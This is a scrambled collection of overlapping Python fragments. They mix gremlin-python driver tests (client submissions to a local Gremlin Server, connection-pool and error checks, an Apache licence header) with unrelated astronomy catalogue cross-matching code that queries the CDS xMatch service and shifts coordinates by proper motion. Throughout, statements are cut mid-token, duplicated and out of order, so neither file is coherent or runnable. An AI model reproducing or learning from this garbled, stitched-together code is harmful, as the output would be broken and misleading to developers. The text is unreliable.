RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) message2 =", "result_set = client.submit(message) results = [] for result in result_set:", "for additional information regarding copyright ownership. The ASF licenses this", "the License for the specific language governing permissions and limitations", "fixture with pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g", "may not use this file except in compliance with the", "future.result() assert len(result_set.all().result()) == 6 def test_multi_conn_pool(client): g = Graph().traversal()", "g.with_(\"x\", \"test\").with_(\"y\", True).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "implied. 
See the License for the specific language governing permissions", "{'g': 'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) == 6 ##", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "pytest from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.client import Client from", "== 6 def test_multi_conn_pool(client): g = Graph().traversal() t = g.V()", "result in result_set: results += result assert len(results) == 1", "client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g = Graph().traversal() t =", "the second to yield result - pool_size=1 assert future.done() result_set", "import Graph __author__ = '<NAME> (<EMAIL>)' def test_connection(connection): g =", "import GremlinServerError from gremlin_python.driver.request import RequestMessage from gremlin_python.process.strategies import OptionsStrategy", "True})).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})", "len(results) == 10 t = g.V().limit(100) message = RequestMessage('traversal', 'bytecode',", "size to be 1 again after query returned assert gse.status_code", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set = client.submit(message) results", "results_set.status_attributes def test_client_simple_eval(client): assert client.submit('1 + 1').all().result()[0] == 2 def", "message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future", "OptionsStrategy from gremlin_python.process.graph_traversal import __ from gremlin_python.structure.graph import Graph __author__", "as ex: assert 'exceptions' in ex.status_attributes assert 'stackTrace' in ex.status_attributes", "with pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g =", "'aliases': {'g': 'g'}}) result_set = secure_client.submit(message) results = [] for", "len(result_set.all().result()) == 6 def test_client_bytecode_options(client): # smoke test to validate", "pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g = Graph().traversal()", "of the strategy via bytecode g = Graph().traversal() t =", "'g'}}) result_set = client.submit(message) results = [] for result in", "t = g.V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "writing, software distributed under the License is distributed on an", "'g', pool_size=1) future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 =", "except GremlinServerError as gse: # expecting the pool size to", "See the NOTICE file distributed with this work for additional", "g.V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})", "in compliance with the License. 
You may obtain a copy", "no way to access the internals of the strategy via", "len(result_set2.all().result()) == 6 # with connection pool `future` may or", "future.result() assert len(result_set.all().result()) == 6 def test_connection_share(client): # Overwrite fixture", "validate this from an integration # test perspective because there's", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set = client.submit(message)", "result assert len(results) == 1 t = g.V().limit(10) message =", "test to validate serialization of OptionsStrategy. no way to really", "agreed to in writing, software distributed under the License is", "== 6 def test_big_result_set(client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name',", "at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to", "no way to really validate this from an integration #", "1000 t = g.V().limit(10000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "result_set2 = future2.result() assert len(result_set2.all().result()) == 6 # with connection", "== 6 def test_iterate_result_set(client): g = Graph().traversal() t = g.V()", "This future has to finish for the second to yield", "ex.status_attributes def test_client_connection_pool_after_error(client): # Overwrite fixture with pool_size=1 client client", "result_set = secure_client.submit(message) results = [] for result in result_set:", "+= result assert len(results) == 1 t = g.V().limit(10) message", "in result_set: results += result assert len(results) == 6 def", "len(results) == 10000 def test_big_result_set_secure(secure_client): g = Graph().traversal() t =", "from gremlin_python.process.strategies import OptionsStrategy from gremlin_python.process.graph_traversal import __ from gremlin_python.structure.graph", "- pool_size=1 assert future.done() result_set = future.result() assert len(result_set.all().result()) ==", "internals of the strategy via bytecode g = Graph().traversal() t", "information regarding copyright ownership. The ASF licenses this file to", "import OptionsStrategy from gremlin_python.process.graph_traversal import __ from gremlin_python.structure.graph import Graph", "in result_set: results += result assert len(results) == 100 t", "assert len(results) == 6 assert isinstance(results, list) assert results_set.done.done() assert", "import pytest from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.client import Client", "{'g': 'gmodern'}}) client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future = client.submitAsync(message)", "either express or implied. 
See the License for the specific", "result assert len(results) == 100 t = g.V().limit(1000) message =", "BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "assert len(result_set.all().result()) == 6 def test_big_result_set(client): g = Graph().traversal() t", "597 assert client.available_pool_size == 1 def test_client_bytecode(client): g = Graph().traversal()", "try: # should fire an exception client.submit('1/0').all().result() assert False except", "\"License\"); you may not use this file except in compliance", "len(result_set.all().result()) == 6 def test_multi_conn_pool(client): g = Graph().traversal() t =", "License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES", "== 6 def test_client_bytecode_options(client): # smoke test to validate serialization", "an integration # test perspective because there's no way to", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) message2 = RequestMessage('traversal', 'bytecode',", "'aliases': {'g': 'gmodern'}}) results_set = connection.write(message).result() future = results_set.all() results", "= g.V().limit(10000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "and limitations under the License. ''' import pytest from gremlin_python.driver.protocol", "+ x', {'x': 2}).all().result()[0] == 4 def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result())", "License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed", "contributor license agreements. See the NOTICE file distributed with this", "License for the specific language governing permissions and limitations under", "t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "here result_set = future.result() assert len(result_set.all().result()) == 6 def test_big_result_set(client):", "'gmodern'}}) client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future = client.submitAsync(message) future2", "assert len(result_set.all().result()) == 6 def test_connection_share(client): # Overwrite fixture with", "future = client.submitAsync(message) result_set = future.result() assert len(result_set.all().result()) == 6", "to really validate this from an integration # test perspective", "def test_client_simple_eval_bindings(client): assert client.submit('x + x', {'x': 2}).all().result()[0] == 4", "= RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) results_set =", "t.bytecode, 'aliases': {'g': 'gmodern'}}) client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future", "t.bytecode, 'aliases': {'g': 'g'}}) result_set = secure_client.submit(message) results = []", "message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future", "from gremlin_python.driver.request import RequestMessage from gremlin_python.process.strategies import OptionsStrategy from gremlin_python.process.graph_traversal", "ex.status_attributes assert 'stackTrace' in ex.status_attributes def test_client_connection_pool_after_error(client): # Overwrite fixture", "results_set = connection.write(message).result() future = results_set.all() results = future.result() assert", "GremlinServerError as ex: assert 'exceptions' in ex.status_attributes assert 'stackTrace' in", "'g'}}) result_set = secure_client.submit(message) results = [] for result in", "the strategy via 
bytecode g = Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\":", "future2.result() assert len(result_set2.all().result()) == 6 # with connection pool `future`", "gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.client import Client from gremlin_python.driver.protocol import", "100 t = g.V().limit(1000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "there's no way to access the internals of the strategy", "via bytecode g = Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\":", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) results_set = connection.write(message).result() future", "except in compliance with the License. You may obtain a", "= client.submitAsync(message) result_set = future.result() assert len(result_set.all().result()) == 6 def", "an exception client.submit('1/0').all().result() assert False except GremlinServerError as gse: #", "result_set = future.result() assert len(result_set.all().result()) == 6 def test_big_result_set(client): g", "from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.client import Client from gremlin_python.driver.protocol", "def test_big_result_set_secure(secure_client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message", "import Client from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.request import RequestMessage", "== 6 def test_connection_share(client): # Overwrite fixture with pool_size=1 client", "len(result_set2.all().result()) == 6 # This future has to finish for", "t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V() message = RequestMessage('traversal', 'bytecode',", "compliance with the License. You may obtain a copy of", "under one or more contributor license agreements. See the NOTICE", "permissions and limitations under the License. ''' import pytest from", "assert 'stackTrace' in ex.status_attributes def test_client_connection_pool_after_error(client): # Overwrite fixture with", "'gmodern'}}) result_set = client.submit(message) results = [] for result in", "with connection pool `future` may or may not be done", "'host' in results_set.status_attributes def test_client_simple_eval(client): assert client.submit('1 + 1').all().result()[0] ==", "validate serialization of OptionsStrategy. 
no way to really validate this", "test_iterate_result_set(client): g = Graph().traversal() t = g.V() message = RequestMessage('traversal',", "== 10000 def test_big_result_set_secure(secure_client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name',", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) message2 = RequestMessage('traversal',", "1 def test_client_bytecode(client): g = Graph().traversal() t = g.V() message", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) future2", "result assert len(results) == 10000 def test_big_result_set_secure(secure_client): g = Graph().traversal()", "6 def test_multi_conn_pool(client): g = Graph().traversal() t = g.V() message", "Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g = Graph().traversal() t = g.V() message", "as gse: # expecting the pool size to be 1", "client.submitAsync(message) result_set = future.result() assert len(result_set.all().result()) == 6 def test_connection_share(client):", "6 # This future has to finish for the second", "finish for the second to yield result - pool_size=1 assert", "fixture with pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try:", "False except GremlinServerError as gse: # expecting the pool size", "GremlinServerError from gremlin_python.driver.client import Client from gremlin_python.driver.protocol import GremlinServerError from", "results += result assert len(results) == 100 t = g.V().limit(1000)", "(ASF) under one or more contributor license agreements. See the", "False except GremlinServerError as ex: assert 'exceptions' in ex.status_attributes assert", "assert len(result_set.all().result()) == 6 def test_multi_conn_pool(client): g = Graph().traversal() t", "= client.submit(message) assert len(result_set.all().result()) == 6 ## t = g.with_(\"x\",", "in results_set.status_attributes def test_client_simple_eval(client): assert client.submit('1 + 1').all().result()[0] == 2", "def test_client_bytecode(client): g = Graph().traversal() t = g.V() message =", "work for additional information regarding copyright ownership. The ASF licenses", "future has to finish for the second to yield result", "== 4 def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) == 6 def test_client_error(client):", "{'g': 'gmodern'}}) future = client.submitAsync(message) result_set = future.result() assert len(result_set.all().result())", "6 # with connection pool `future` may or may not", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message)", "or more contributor license agreements. See the NOTICE file distributed", "result in result_set: results += result assert len(results) == 1000", "'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) == 6 def test_client_bytecode_options(client):", "= client.submit(message) assert len(result_set.all().result()) == 6 def test_iterate_result_set(client): g =", "copyright ownership. 
The ASF licenses this file to you under", "Software Foundation (ASF) under one or more contributor license agreements.", "isinstance(results, list) assert results_set.done.done() assert 'host' in results_set.status_attributes def test_client_simple_eval(client):", "distributed with this work for additional information regarding copyright ownership.", "done here result_set = future.result() assert len(result_set.all().result()) == 6 def", "message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) message2", "the pool size to be 1 again after query returned", "6 def test_client_async(client): g = Graph().traversal() t = g.V() message", "'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) == 6 def test_iterate_result_set(client):", "under the License. ''' import pytest from gremlin_python.driver.protocol import GremlinServerError", "in result_set: results += result assert len(results) == 1 t", "results_set.all() results = future.result() assert len(results) == 6 assert isinstance(results,", "Unless required by applicable law or agreed to in writing,", "by applicable law or agreed to in writing, software distributed", "access the internals of the strategy via bytecode g =", "expecting the pool size to be 1 again after query", "assert len(result_set2.all().result()) == 6 # This future has to finish", "= future.result() assert len(result_set.all().result()) == 6 def test_big_result_set(client): g =", "len(results) == 6 def test_client_async(client): g = Graph().traversal() t =", "pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try: # should", "result_set: results += result assert len(results) == 1 t =", "'<NAME> (<EMAIL>)' def test_connection(connection): g = Graph().traversal() t = g.V()", "result_set: results += result assert len(results) == 6 def test_client_async(client):", "def test_client_connection_pool_after_error(client): # Overwrite fixture with pool_size=1 client client =", "'gmodern'}}) future = client.submitAsync(message) result_set = future.result() assert len(result_set.all().result()) ==", "the Apache Software Foundation (ASF) under one or more contributor", "= future.result() assert len(results) == 6 assert isinstance(results, list) assert", "+= result assert len(results) == 10000 def test_big_result_set_secure(secure_client): g =", "NOTICE file distributed with this work for additional information regarding", "express or implied. See the License for the specific language", "the License. 
''' import pytest from gremlin_python.driver.protocol import GremlinServerError from", "may not be done here result_set = future.result() assert len(result_set.all().result())", "''' Licensed to the Apache Software Foundation (ASF) under one", "test_client_simple_eval(client): assert client.submit('1 + 1').all().result()[0] == 2 def test_client_simple_eval_bindings(client): assert", "assert len(result_set2.all().result()) == 6 # with connection pool `future` may", "# Overwrite fixture with pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern',", "import __ from gremlin_python.structure.graph import Graph __author__ = '<NAME> (<EMAIL>)'", "client.submit('1/0').all().result() assert False except GremlinServerError as gse: # expecting the", "len(result_set.all().result()) == 6 def test_iterate_result_set(client): g = Graph().traversal() t =", "yield result - pool_size=1 assert future.done() result_set = future.result() assert", "def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) == 6 def test_client_error(client): try: #", "client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g = Graph().traversal() t", "4 def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) == 6 def test_client_error(client): try:", "\"test\", \"y\": True})).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "GremlinServerError as gse: # expecting the pool size to be", "assert len(results) == 10 t = g.V().limit(100) message = RequestMessage('traversal',", "assert len(results) == 100 t = g.V().limit(1000) message = RequestMessage('traversal',", "test_multi_conn_pool(client): g = Graph().traversal() t = g.V() message = RequestMessage('traversal',", "result - pool_size=1 assert future.done() result_set = future.result() assert len(result_set.all().result())", "obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required", "+= result assert len(results) == 10 t = g.V().limit(100) message", "x', {'x': 2}).all().result()[0] == 4 def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) ==", "# This future has to finish for the second to", "for result in result_set: results += result assert len(results) ==", "2 def test_client_simple_eval_bindings(client): assert client.submit('x + x', {'x': 2}).all().result()[0] ==", "future.done() result_set = future.result() assert len(result_set.all().result()) == 6 def test_multi_conn_pool(client):", "test_connection(connection): g = Graph().traversal() t = g.V() message = RequestMessage('traversal',", "assert client.submit('1 + 1').all().result()[0] == 2 def test_client_simple_eval_bindings(client): assert client.submit('x", "'stackTrace' in ex.status_attributes def test_client_connection_pool_after_error(client): # Overwrite fixture with pool_size=1", "result_set = future.result() assert len(result_set.all().result()) == 6 def test_connection_share(client): #", "''' import pytest from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.client import", "results += result assert len(results) == 1 t = g.V().limit(10)", "assert future.done() result_set = future.result() assert len(result_set.all().result()) == 6 def", "message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set", "# expecting the pool size to be 1 again after", "# with connection pool `future` may or may not be", 
"future.result() assert len(result_set.all().result()) == 6 def test_big_result_set(client): g = Graph().traversal()", "test_big_result_set_secure(secure_client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message =", "with the License. You may obtain a copy of the", "result_set = client.submit(message) assert len(result_set.all().result()) == 6 ## t =", "t.bytecode, 'aliases': {'g': 'gmodern'}}) message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "test perspective because there's no way to access the internals", "= g.V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) client", "10000 def test_big_result_set_secure(secure_client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count()", "= connection.write(message).result() future = results_set.all() results = future.result() assert len(results)", "future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 = future2.result() assert", "{'g': 'gmodern'}}) results_set = connection.write(message).result() future = results_set.all() results =", "client.available_pool_size == 1 def test_client_bytecode(client): g = Graph().traversal() t =", "t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) result_set = future.result()", "list) assert results_set.done.done() assert 'host' in results_set.status_attributes def test_client_simple_eval(client): assert", "future2.result() assert len(result_set2.all().result()) == 6 # This future has to", "applicable law or agreed to in writing, software distributed under", "to yield result - pool_size=1 assert future.done() result_set = future.result()", "bytecode g = Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V()", "test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) == 6 def test_client_error(client): try: # should", "result assert len(results) == 6 def test_client_async(client): g = Graph().traversal()", "the License is distributed on an \"AS IS\" BASIS, WITHOUT", "the specific language governing permissions and limitations under the License.", "OptionsStrategy. no way to really validate this from an integration", "6 def test_connection_share(client): # Overwrite fixture with pool_size=1 client client", "results += result assert len(results) == 1000 t = g.V().limit(10000)", "'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) results = [] for", "`future` may or may not be done here result_set =", "= future2.result() assert len(result_set2.all().result()) == 6 # with connection pool", "{'g': 'gmodern'}}) future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 =", "this work for additional information regarding copyright ownership. 
The ASF", "connection.write(message).result() future = results_set.all() results = future.result() assert len(results) ==", "result_set = client.submit(message) assert len(result_set.all().result()) == 6 def test_client_bytecode_options(client): #", "or agreed to in writing, software distributed under the License", "this file to you under the Apache License, Version 2.0", "gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.request import RequestMessage from gremlin_python.process.strategies import", "client.submit('1/0').all().result() assert False except GremlinServerError as ex: assert 'exceptions' in", "= client.submitAsync(message2) result_set2 = future2.result() assert len(result_set2.all().result()) == 6 #", "returned assert gse.status_code == 597 assert client.available_pool_size == 1 def", "= Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V() message =", "result assert len(results) == 10 t = g.V().limit(100) message =", "this from an integration # test perspective because there's no", "to access the internals of the strategy via bytecode g", "t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) results = []", "== 6 ## t = g.with_(\"x\", \"test\").with_(\"y\", True).V() message =", "license agreements. See the NOTICE file distributed with this work", "def test_client_error(client): try: # should fire an exception client.submit('1/0').all().result() assert", "OF ANY KIND, either express or implied. See the License", "client.submit(message) assert len(result_set.all().result()) == 6 def test_iterate_result_set(client): g = Graph().traversal()", "= future.result() assert len(result_set.all().result()) == 6 def test_multi_conn_pool(client): g =", "an exception client.submit('1/0').all().result() assert False except GremlinServerError as ex: assert", "client.submit(message) results = [] for result in result_set: results +=", "result_set = future.result() assert len(result_set.all().result()) == 6 def test_multi_conn_pool(client): g", "assert results_set.done.done() assert 'host' in results_set.status_attributes def test_client_simple_eval(client): assert client.submit('1", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) results", "Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2", "License, Version 2.0 (the \"License\"); you may not use this", "Overwrite fixture with pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1)", "{'g': 'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) == 6 def", "= client.submit(message) assert len(result_set.all().result()) == 6 def test_client_bytecode_options(client): # smoke", "secure_client.submit(message) results = [] for result in result_set: results +=", "import RequestMessage from gremlin_python.process.strategies import OptionsStrategy from gremlin_python.process.graph_traversal import __", "__ from gremlin_python.structure.graph import Graph __author__ = '<NAME> (<EMAIL>)' def", "test_client_async(client): g = Graph().traversal() t = g.V() message = RequestMessage('traversal',", "a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by", "gremlin_python.structure.graph import Graph __author__ = '<NAME> (<EMAIL>)' def test_connection(connection): g", "GremlinServerError from 
gremlin_python.driver.request import RequestMessage from gremlin_python.process.strategies import OptionsStrategy from", "len(result_set.all().result()) == 6 ## t = g.with_(\"x\", \"test\").with_(\"y\", True).V() message", "t = g.V().limit(1000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "License. You may obtain a copy of the License at", "== 1000 t = g.V().limit(10000) message = RequestMessage('traversal', 'bytecode', {'gremlin':", "pool_size=1) try: # should fire an exception client.submit('1/0').all().result() assert False", "not be done here result_set = future.result() assert len(result_set.all().result()) ==", "result_set: results += result assert len(results) == 10000 def test_big_result_set_secure(secure_client):", "6 def test_big_result_set(client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count()", "result_set: results += result assert len(results) == 100 t =", "result assert len(results) == 1000 t = g.V().limit(10000) message =", "client.submit(message) assert len(result_set.all().result()) == 6 def test_client_bytecode_options(client): # smoke test", "'gmodern', pool_size=1) g = Graph().traversal() t = g.V() message =", "def test_client_simple_eval(client): assert client.submit('1 + 1').all().result()[0] == 2 def test_client_simple_eval_bindings(client):", "an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY", "= Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future = client.submitAsync(message) future2 = client.submitAsync(message2)", "test_connection_share(client): # Overwrite fixture with pool_size=1 client client = Client('ws://localhost:45940/gremlin',", "gremlin_python.driver.client import Client from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.request import", "client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try: # should fire an", "assert client.available_pool_size == 1 def test_client_bytecode(client): g = Graph().traversal() t", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) client = Client('ws://localhost:45940/gremlin', 'g',", "query returned assert gse.status_code == 597 assert client.available_pool_size == 1", "## t = g.with_(\"x\", \"test\").with_(\"y\", True).V() message = RequestMessage('traversal', 'bytecode',", "'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) result_set = future.result() assert", "== 1 t = g.V().limit(10) message = RequestMessage('traversal', 'bytecode', {'gremlin':" ]
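# ---------------------------------------------------------------------------
# Illustrative sketch (hypothetical; the real `connection`, `client`, and
# `secure_client` fixtures used above live in a conftest.py that is not shown
# here). Assuming a Gremlin Server listening on ws://localhost:45940/gremlin,
# as the tests above do, a minimal client fixture could look like this; the
# name is deliberately different so it cannot shadow the real fixture.
@pytest.fixture
def _sketch_client():
    client = Client('ws://localhost:45940/gremlin', 'gmodern')
    yield client
    client.close()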
[ "2016-09-21 - Account for Gaia epoch 2015 - Bovy (UofT)", "cat2['ref_epoch'] else: epoch2= 2000. _check_epoch(cat1,epoch1) _check_epoch(cat2,epoch2) depoch= epoch2-epoch1 if numpy.any(depoch", "catalog INPUT cat - original catalog xcat - matched catalog", "= idx_1[temp_idx] d2d[cat2[col_field] == unique] = temp_d2d else: temp_idx, temp_d2d,", "interface INPUT: cat - a catalog to cross match, requires", "but not the other continue if swap: temp_idx, temp_d2d, d3d", "names=True, max_rows=1, dtype='float64') # only read the first row max", "xMatch batch {} / {} ...\\r\"\\ .format(thisrun1,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename1,posfilename1,", "Dec with additional matching in the data tag specified by", "is None: os.remove(resultfilename) else: shutil.move(resultfilename,savefilename) # Match back to the", "if False, find closest matches in cat2 for each cat1", "different) INPUT: cat1 - First catalog cat2 - Second catalog", "in half cnt= 0 with open(posfilename,'r') as posfile: with open(posfilename1,'a')", "string raise KeyError(\"'%s' does not exist in both catalog\" %", "unique] = idx_2[temp_idx] d2d[cat1[col_field] == unique] = temp_d2d d2d =", "has duplicates) col_field= (None) if None, simply cross-match on RA", "skip_header=0, filling_values=-9999.99, names=True, dtype='float128') def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best', epoch=None,colpmRA='pmra',colpmDec='pmdec',): \"\"\" NAME: cds_matchback", "warn_about_epoch= False if 'ref_epoch' in cat.dtype.fields: if 'designation' not in", "batches _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat) try: ma= cds_load(resultfilename) except ValueError: # Assume this", "numpy.arange(len(cat1)) idx[cat1[col_field] == unique] = idx_2[temp_idx] d2d[cat1[col_field] == unique] =", "cat with the proper motion in right ascension in degree", "do not have float128, but source_id is double # get", "as posfile1: with open(posfilename2,'a') as posfile2: for line in posfile:", "the opposite (important when one of the catalogs has duplicates)", "maxdist= (2) maximum distance in arcsec colRA1= ('RA') name of", "tag in cat with the right ascension colDec= ('DEC') name", "unit=(u.degree, u.degree),frame='icrs') if col_field is not None: try: # check", "ma.rename_column('mdec','DEC') finally: os.remove(xmlfilename) # Remove temporary files os.remove(posfilename) if savefilename", "numpy.uint64) return numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, dtype=dtype_list) else: return", "mc2[idx_2].match_to_catalog_sky(mc1[idx_1]) m1 = numpy.arange(len(cat2)) idx[cat2[col_field] == unique] = idx_1[temp_idx] d2d[cat2[col_field]", "else: if swap: idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) m1= numpy.arange(len(cat2)) else: idx,d2d,d3d", "on input RA ma= cds_load(resultfilename) if gaia_all_columns: from astroquery.gaia import", "g.source_id\"\"\" % table_identifier, upload_resource=xmlfilename, upload_table_name=\"my_table\") ma= job.get_results() except: print(\"gaia_tools.xmath.cds failed", "at the end and filtered out d2d = numpy.ones(len(cat2)) *", "2000. 
if epoch2 is None: if 'ref_epoch' in cat2.dtype.fields: epoch2=", "additional catalog field matching - Leung (UofT) \"\"\" if epoch1", "(see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like 'vizier:Tycho2' or 'vizier:I/345/gaia2') maxdist= (2) maximum", "= numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, max_rows=1, dtype='float64') # only", "# Count the number of objects with open(posfilename,'r') as posfile:", "colpmRA=colpmRA,colpmDec=colpmDec) return (ma,mai) def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat, nruns_necessary=1): \"\"\"CDS xMatch (sometimes?) fails", "matching result= open(resultfilename,'w') try: subprocess.check_call(['curl', '-X','POST', '-F','request=xmatch', '-F','distMaxArcsec=%i' % maxdist,", "to the original catalog INPUT cat - original catalog xcat", "in uniques: # loop over the class idx_1 = numpy.arange(cat1[colRA1].shape[0])[cat1[col_field]", "cat.dtype.fields: epoch= cat['ref_epoch'] else: epoch= 2000. _check_epoch(cat,epoch) depoch= epoch-2000. if", "all gaia columns, returning just the default returned by the", "by xmatch.cds colRA= ('RA') name of the tag in cat", "ones which are untouched mindx= ((d2d < maxdist*u.arcsec) & (0.*u.arcsec", "and Dec; if a string, then cross-match on RA and", "with open(posfilename2,'w') as posfile2: with open(posfilename,'r') as posfile: posfile2.write(posfile.readline()) #", "source_id is always integer anyway # first read everything as", "Don't shift objects with non-existing proper motion dra[numpy.isnan(cat2[colpmRA2])]= 0. ddec[numpy.isnan(cat2[colpmDec2])]=", "in the data tag specified by the string OUTPUT: (index", "match, indices into cat of matching sources: index[0] is cat", "if epochs are different) INPUT: cat1 - First catalog cat2", "used when epochs are different] swap= (False) if False, find", "the other continue if swap: temp_idx, temp_d2d, d3d = mc2[idx_2].match_to_catalog_sky(mc1[idx_1])", "'source_id' being int64 dtype_list = [('{}'.format(i), numpy.float64) for i in", "CDS archive using the CDS cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch); uses the", "'ref_epoch' in cat2.dtype.fields: epoch2= cat2['ref_epoch'] else: epoch2= 2000. _check_epoch(cat1,epoch1) _check_epoch(cat2,epoch2)", "or 2015.5 (DR2), which may lead to incorrect matches\") return", "at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html) epoch= (2000.) epoch of the coordinates in cat", "* temp_d2d.unit # make sure finally we have an unit", "return nruns # xMatch failed because of time-out, split posfilename1=", "when epoch != 2000.] OUTPUT: Array indices into cat of", "mc2.match_to_catalog_sky(mc1) m1= 